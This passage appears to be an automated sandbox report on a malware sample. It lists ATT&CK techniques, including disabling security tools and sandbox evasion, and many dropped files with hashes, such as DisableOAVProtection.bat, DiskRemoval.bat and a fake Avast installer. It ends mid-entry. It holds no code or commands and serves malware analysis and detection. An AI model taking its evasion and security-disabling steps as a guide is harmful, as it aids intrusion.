                                                                                                                                        Modify Registry

                                                                                                                                        2
                                                                                                                                        T1112

                                                                                                                                        Disabling Security Tools

                                                                                                                                        1
                                                                                                                                        T1089

                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                        1
                                                                                                                                        T1497

                                                                                                                                        Discovery

                                                                                                                                        Query Registry

                                                                                                                                        4
                                                                                                                                        T1012

                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                        1
                                                                                                                                        T1497

                                                                                                                                        System Information Discovery

                                                                                                                                        5
                                                                                                                                        T1082

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                          Filesize

                                                                                                                                          1.0MB

                                                                                                                                          MD5

                                                                                                                                          97a2db945a42346cdae06304a03250a8

                                                                                                                                          SHA1

                                                                                                                                          2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                          SHA256

                                                                                                                                          1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                          SHA512

                                                                                                                                          3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                        • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                          Filesize

                                                                                                                                          1.0MB

                                                                                                                                          MD5

                                                                                                                                          97a2db945a42346cdae06304a03250a8

                                                                                                                                          SHA1

                                                                                                                                          2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                          SHA256

                                                                                                                                          1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                          SHA512

                                                                                                                                          3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                        • C:\Program Files (x86)\avastvpn.exe
                                                                                                                                          Filesize

                                                                                                                                          8.3MB

                                                                                                                                          MD5

                                                                                                                                          6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                          SHA1

                                                                                                                                          e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                          SHA256

                                                                                                                                          4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                          SHA512

                                                                                                                                          e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                        • C:\Program Files (x86)\avastvpn.exe
                                                                                                                                          Filesize

                                                                                                                                          8.3MB

                                                                                                                                          MD5

                                                                                                                                          6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                          SHA1

                                                                                                                                          e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                          SHA256

                                                                                                                                          4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                          SHA512

                                                                                                                                          e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\16TgUIYv\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\16TgUIYv\DisableOAVProtection.bat
                                                                                                                                          Filesize

                                                                                                                                          33KB

                                                                                                                                          MD5

                                                                                                                                          c97c64f53865b9da2a642d36b02df043

                                                                                                                                          SHA1

                                                                                                                                          181ca1deb68409feae2e70ebf347b3111218a47a

                                                                                                                                          SHA256

                                                                                                                                          1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                                                                                          SHA512

                                                                                                                                          05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                                                                                        • C:\ProgramData\16TgUIYv\DiskRemoval.bat
                                                                                                                                          Filesize

                                                                                                                                          211B

                                                                                                                                          MD5

                                                                                                                                          0f00552cee3a31dc4e8adc2738ca6d76

                                                                                                                                          SHA1

                                                                                                                                          85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                                                                                          SHA256

                                                                                                                                          1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                                                                                          SHA512

                                                                                                                                          137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                                                                                        • C:\ProgramData\16TgUIYv\MMF.vbs
                                                                                                                                          Filesize

                                                                                                                                          20KB

                                                                                                                                          MD5

                                                                                                                                          fa6dcfa398aff28ba12687272732eb51

                                                                                                                                          SHA1

                                                                                                                                          f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                                                                                          SHA256

                                                                                                                                          f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                                                                                          SHA512

                                                                                                                                          9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                                                                                        • C:\ProgramData\16TgUIYv\extracted\ANTIAV~1.DAT
                                                                                                                                          Filesize

                                                                                                                                          2.0MB

                                                                                                                                          MD5

                                                                                                                                          e177d8a197054920edc50c867c4d83c7

                                                                                                                                          SHA1

                                                                                                                                          93a9a13cb0e431d5d16c8d4656a71fe799e293b6

                                                                                                                                          SHA256

                                                                                                                                          91660c99fa87b69b7580ce7ce912120972e035f6ec058d9c1459f4f57098dfaf

                                                                                                                                          SHA512

                                                                                                                                          a39d0ee3e5f54366992dad2287bb2987b3d5aa4cb9b89354f43b36dcd57d466391e9927893803456a2b9fa19841eb0162dd2b4d97adba03ffe2005f1d51bd3a0

                                                                                                                                        • C:\ProgramData\16TgUIYv\extracted\file_1.zip
                                                                                                                                          Filesize

                                                                                                                                          711KB

                                                                                                                                          MD5

                                                                                                                                          68c03d9f4ec112a706451e52ab0d0b6f

                                                                                                                                          SHA1

                                                                                                                                          70e4273937d277b2eb31cc355dafb614e7d92f0f

                                                                                                                                          SHA256

                                                                                                                                          2187fcb6ee171a80c7095fc4ce893ca4f543821a5dfed8e3ee4c16b5846cf5c2

                                                                                                                                          SHA512

                                                                                                                                          450255afb9105294a952bf53cb2ac6fdacfd000d10596b64e464566c3bdd23af127767ab4117b67195f4e6eed3e7b7470cd5254a2bc8e2c20f2a68dcfaf3cde0

                                                                                                                                        • C:\ProgramData\16TgUIYv\extracted\file_2.zip
                                                                                                                                          Filesize

                                                                                                                                          711KB

                                                                                                                                          MD5

                                                                                                                                          465948131d48f0baa17e0bf956d05809

                                                                                                                                          SHA1

                                                                                                                                          76c9154637e706f48201c1f2714541d992c5566e

                                                                                                                                          SHA256

                                                                                                                                          79454b0e77c513282954fe6aaf30f1a7091ecb82044c5fc6c499fd8bc60fb1ce

                                                                                                                                          SHA512

                                                                                                                                          dc42c9261855682cdfbb5a6bf07d689f6485564fa31b66cdf4930ea10e4b06a92cb6b7d06989b57766a9032e2e5a3a685cf41b9b30faeb4947f4b676b26ff1c9

                                                                                                                                        • C:\ProgramData\16TgUIYv\extracted\file_3.zip
                                                                                                                                          Filesize

                                                                                                                                          2.2MB

                                                                                                                                          MD5

                                                                                                                                          fd0491fdaf5981fb3a2838a05d0eebcf

                                                                                                                                          SHA1

                                                                                                                                          327109c15b1edfa7b414becefed917d5da249365

                                                                                                                                          SHA256

                                                                                                                                          a9b1c8af8081cd01593c16558871f9e9c6ee7b5ee7642a83091ffec7bc605fc8

                                                                                                                                          SHA512

                                                                                                                                          415cff0b902334733d392809f1b7d45df237eee94d962764a07ddd551af4847ee8fde3fa37aeccca37dcfee6afc786643fc167915bc3d505ae335b098106a639

                                                                                                                                        • C:\ProgramData\16TgUIYv\extracted\nmhost.exe
                                                                                                                                          Filesize

                                                                                                                                          1.2MB

                                                                                                                                          MD5

                                                                                                                                          afb2c0a5886354403bcdabb3c3f04e67

                                                                                                                                          SHA1

                                                                                                                                          8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                                                                                          SHA256

                                                                                                                                          b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                                                                                          SHA512

                                                                                                                                          6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                                                                                        • C:\ProgramData\16TgUIYv\file.bin
                                                                                                                                          Filesize

                                                                                                                                          2.2MB

                                                                                                                                          MD5

                                                                                                                                          790b451c8430b0c527f9ede30cce5f29

                                                                                                                                          SHA1

                                                                                                                                          5de6843d48641c14023c7f07f631f2a364697ae3

                                                                                                                                          SHA256

                                                                                                                                          777753312bb53895bb19c12c968ad5948fd4adcc534dee97d32b570fd6b827a7

                                                                                                                                          SHA512

                                                                                                                                          168ab36305b68e145ff7623ea611dba3ac3e1d6354ae9b3b8f621a179d75c07bda2237057320b440bf6a553dc48ee3a23fb4cad44dc52dc0cb62b455d2a0aafd

                                                                                                                                        • C:\ProgramData\16TgUIYv\main.bat
                                                                                                                                          Filesize

                                                                                                                                          397B

                                                                                                                                          MD5

                                                                                                                                          7bcce13698737af294fffe1859c19b80

                                                                                                                                          SHA1

                                                                                                                                          33cd5b5e0c5dc1f515f93928fa6a0b0e81f591cc

                                                                                                                                          SHA256

                                                                                                                                          d5fa298b9210682b6d0d181ba1db301aa3f7eec2c69d5728cdd5c979d905e16c

                                                                                                                                          SHA512

                                                                                                                                          c491517707fa34593c4e0b66228eab2866d2c36f59377b2f2328e3dd88653e5cd64bdd6d07bf8fc8481fee02f34cd01c1d836aebacf6ffb89ea67f3ff4aa8d18

                                                                                                                                        • C:\ProgramData\16TgUIYv\nmhost.exe
                                                                                                                                          Filesize

                                                                                                                                          1.2MB

                                                                                                                                          MD5

                                                                                                                                          afb2c0a5886354403bcdabb3c3f04e67

                                                                                                                                          SHA1

                                                                                                                                          8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                                                                                          SHA256

                                                                                                                                          b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                                                                                          SHA512

                                                                                                                                          6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\DisableOAVProtection.bat
                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                          MD5

                                                                                                                                          ed77c2b2866fc09850a317f2620f4f9c

                                                                                                                                          SHA1

                                                                                                                                          ed1d7485a1111bd553ffe81927260652718a1c39

                                                                                                                                          SHA256

                                                                                                                                          763c290bbc1bfaedb53c909a63453d88204680ff6b5e50d7c68b14accc706c17

                                                                                                                                          SHA512

                                                                                                                                          4ed12352142c38750656780acf836805f3190a21aeab117e1c62fa06cf54920754c598daba3e02a981b6440261ce211e5717f6f1183cfebf6c8805d8201fa0e2

                                                                                                                                        • C:\ProgramData\xOUvu\DiskRemoval.bat
                                                                                                                                          Filesize

                                                                                                                                          211B

                                                                                                                                          MD5

                                                                                                                                          0f00552cee3a31dc4e8adc2738ca6d76

                                                                                                                                          SHA1

                                                                                                                                          85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                                                                                          SHA256

                                                                                                                                          1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                                                                                          SHA512

                                                                                                                                          137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                                                                                        • C:\ProgramData\xOUvu\MMF.vbs
                                                                                                                                          Filesize

                                                                                                                                          67KB

                                                                                                                                          MD5

                                                                                                                                          62c210400fef1cb41efa4c8b2c963964

                                                                                                                                          SHA1

                                                                                                                                          fa471dcf721b5f61a8794a75e3a9226e79b3ec80

                                                                                                                                          SHA256

                                                                                                                                          ac5fa9691beee8045bc5b4e4ede4816339cbef901f4d7c83f70e64e8c5f10d10

                                                                                                                                          SHA512

                                                                                                                                          64d99cd6a739bee853820172b24408173c4799f6c61037ad212cb56434fba7f014f58b2f88bcd209fdfd5976a183cd3d91588fc8f274fced444e726cf8e25d5a

                                                                                                                                        • C:\ProgramData\xOUvu\extracted\file_10.zip
                                                                                                                                          Filesize

                                                                                                                                          3.6MB

                                                                                                                                          MD5

                                                                                                                                          653254d9174e6a9e34515f920faaa4fa

                                                                                                                                          SHA1

                                                                                                                                          1655d6e910b8ea9547487548e9862e905d37687f

                                                                                                                                          SHA256

